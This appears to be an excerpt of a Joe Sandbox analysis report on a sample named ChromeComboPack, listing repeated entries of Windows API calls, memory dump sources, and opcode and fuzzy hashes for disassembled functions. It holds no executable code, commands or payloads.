                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,00007FF78C9CB87D,?,?,00000000,00007FF78C9CB932), ref: 00007FF78C9CBA6E
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF78C9CB87D,?,?,00000000,00007FF78C9CB932), ref: 00007FF78C9CBA78
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                                                • Opcode ID: 77e2bcd66fe63b7e32e9c420d5456187ea64b38b498190725808e49f9c0985ab
                                                                                                                                                                                                                                                • Instruction ID: 29303d542c971a00166460a1b5e11ee0d07216625b4ff5c89ba2736b4b7587e4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77e2bcd66fe63b7e32e9c420d5456187ea64b38b498190725808e49f9c0985ab
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A321A121B187C241EA647725E5942BDA2C5BF847B0FE442F5DA6E473D2CE7CE541CB20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 8b800d1c0215c395d8ee5cb256ced11da9c32d068479accee0e1705fd5882e0a
                                                                                                                                                                                                                                                • Instruction ID: 529dc2c2a6ff6d63e8d052f0abf767460351cb9022ed5df33aa04eeb37bb2c40
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b800d1c0215c395d8ee5cb256ced11da9c32d068479accee0e1705fd5882e0a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A341B63291868187EB34AB19E55027DBBA0FB56BA0FB01171D78E476D1CF3CE542CB61
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                                                • Opcode ID: 087b97e7e38f99db5e72ebc7427dc01ff248219a76eac9d4b377bdee4958625f
                                                                                                                                                                                                                                                • Instruction ID: 523f175d6ae3b5ad8a06bd1eac418b8fcc310f9eb2c30256b905c16d404efd12
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 087b97e7e38f99db5e72ebc7427dc01ff248219a76eac9d4b377bdee4958625f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD21A821B08AE266FA14BA1665043FADA53BF45BD5FD854B1EE4D07786CE3CE041C620
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: ec9d5ae5a000e04b57470e1a65c1a2ebd8d322b6e5cd5ccd1e774105d6e8e50b
                                                                                                                                                                                                                                                • Instruction ID: ebe6cc1cd0f16058f86afb4c55936cd2caac91bd2e510f26228fa4d713a7a2d3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec9d5ae5a000e04b57470e1a65c1a2ebd8d322b6e5cd5ccd1e774105d6e8e50b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C318C22E1869286F711BB55988137DAA50BF54BB4FE142F5EA1D133D2CEBCE481DB30
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                                                                                                                                • Opcode ID: da7d5aaa001a85c1e13054e7b60926c5ebf14781b4d980b1a631c30dc526fcea
                                                                                                                                                                                                                                                • Instruction ID: ebcaea4feb8f1cabc1329d6c2c528f8862ba6c2ffcbc01d3993ee0b6a559eed8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da7d5aaa001a85c1e13054e7b60926c5ebf14781b4d980b1a631c30dc526fcea
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A219232E147858AEB24AF64C4842FC77A0FB44738FA48675D71D06AD5EF38D986CB60
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 0e1df9a836e05c53306103cf914f9f5afd0b17d2d4247778ac0f8a736a470cc7
                                                                                                                                                                                                                                                • Instruction ID: 08620dde38c123a003d216a473f1bfd90e78ded5c3b61ca6380f5051c8a67e0e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e1df9a836e05c53306103cf914f9f5afd0b17d2d4247778ac0f8a736a470cc7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5211A522A0C6C181EA60BF51D80017DE260BF95BA0FE44072EB4C57B86CF7DD561CF20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 3767eff042e46cd651120d9163f396646e5b690a05a83219cc7a0fcdceb2a680
                                                                                                                                                                                                                                                • Instruction ID: e181fa5a37f0655a2ca281681c28013f2a61c973dfffd47768400dc75e98feac
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3767eff042e46cd651120d9163f396646e5b690a05a83219cc7a0fcdceb2a680
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05218032A18AC287DB61AF18D448379B6A0BB84B94FB44274EB5D476DDDF3CD810CB11
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 43297e0cb54a728217cf8f13d9f8c23c45e2da10c33361e46a2ef0799771412d
                                                                                                                                                                                                                                                • Instruction ID: 2d6ff4eeca1df09e9e388e6458c2693a254ba3b864770c7127f4aa2c26bf04cc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43297e0cb54a728217cf8f13d9f8c23c45e2da10c33361e46a2ef0799771412d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C012B26B087D680EA04FB629800079E690BF45FF0FA842B1EEAC53BDACE3CD001C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF78C9BC390
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9BCDB8: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF78C9BCDC0
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9BCDB8: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF78C9BCDC5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1208906642-0
                                                                                                                                                                                                                                                • Opcode ID: 86517d9d3c6548b93fa1a500576de9512fe9d6a130677b1fbe86fe464c74cea3
                                                                                                                                                                                                                                                • Instruction ID: 637bc8b38dc92c96c3f390cb29f7bf88a183fe65d7c74f43b76da1914c8cada9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86517d9d3c6548b93fa1a500576de9512fe9d6a130677b1fbe86fe464c74cea3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39E0B654D0D2F3A1FE68366119562BCA7403F65304FF008F5E40E625C3DD4E71569631
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF78C9C0208,?,?,?,00007FF78C9C1872,?,?,?,?,?,00007FF78C9C4535), ref: 00007FF78C9CE6A2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                                • Opcode ID: 3c31cf8336a648e9ecfad8ff9b709a6d49b8502715341f1fffc2c41753e32efa
                                                                                                                                                                                                                                                • Instruction ID: 637d8d0fdac719ea8d65e23036c4ce209a89c6d9d6530addbcea8e8ec9b8af01
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c31cf8336a648e9ecfad8ff9b709a6d49b8502715341f1fffc2c41753e32efa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADF01211F2D2C745FA647BA55A05279E2807F847B0FE946B0DD2F452C1DE5CE950CA31
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: 4c3f9a964b5662b5dbbc0689ef1495c1f66ffbf8daaed71a8dc58c0a28c42fd7
                                                                                                                                                                                                                                                • Instruction ID: e09078ed414a047260d99fbe340c2400ee45fb11e8de49a93cb4e1768a8a36a4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c3f9a964b5662b5dbbc0689ef1495c1f66ffbf8daaed71a8dc58c0a28c42fd7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02316272604BC286EB649F60E8847EDB364FB84744F944439DB4D57B98DF38D648C720
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: c2ba82a54335b4e9d04d7430b1e7b135fe56bba1662feab656e26de9ce49381a
                                                                                                                                                                                                                                                • Instruction ID: 0eac0768fb757d71285c5b5450f2e3048265fb9fe8a0a63a898000a314af3650
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2ba82a54335b4e9d04d7430b1e7b135fe56bba1662feab656e26de9ce49381a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF31A632608BC186D724DF24E8442AEB3A4FB88758FA40135EB9D43B59DF3CD245CB10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                                                                                • Opcode ID: 32354c12137473f88fc301bcfa2a47498a0230f678801c7330137ef8062788be
                                                                                                                                                                                                                                                • Instruction ID: b52d46dc13ea7a429c2f4d60d53460c14f61a01de78c75808ee5b72fa0eafce9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32354c12137473f88fc301bcfa2a47498a0230f678801c7330137ef8062788be
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BB1A722B18AD241EA61AF21A40C1B9E360FB54BE4FA451B1DB5D67BC9DE3CEC41C720
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4C60
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4C72
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4CA9
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4CBB
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4CD4
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4CE6
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4CFF
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4D11
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4D2D
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4D3F
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4D5B
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4D6D
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4D89
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4D9B
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4DB7
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4DC9
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4DE5
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF78C9B591F,00000000,00007FF78C9B272E), ref: 00007FF78C9B4DF7
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
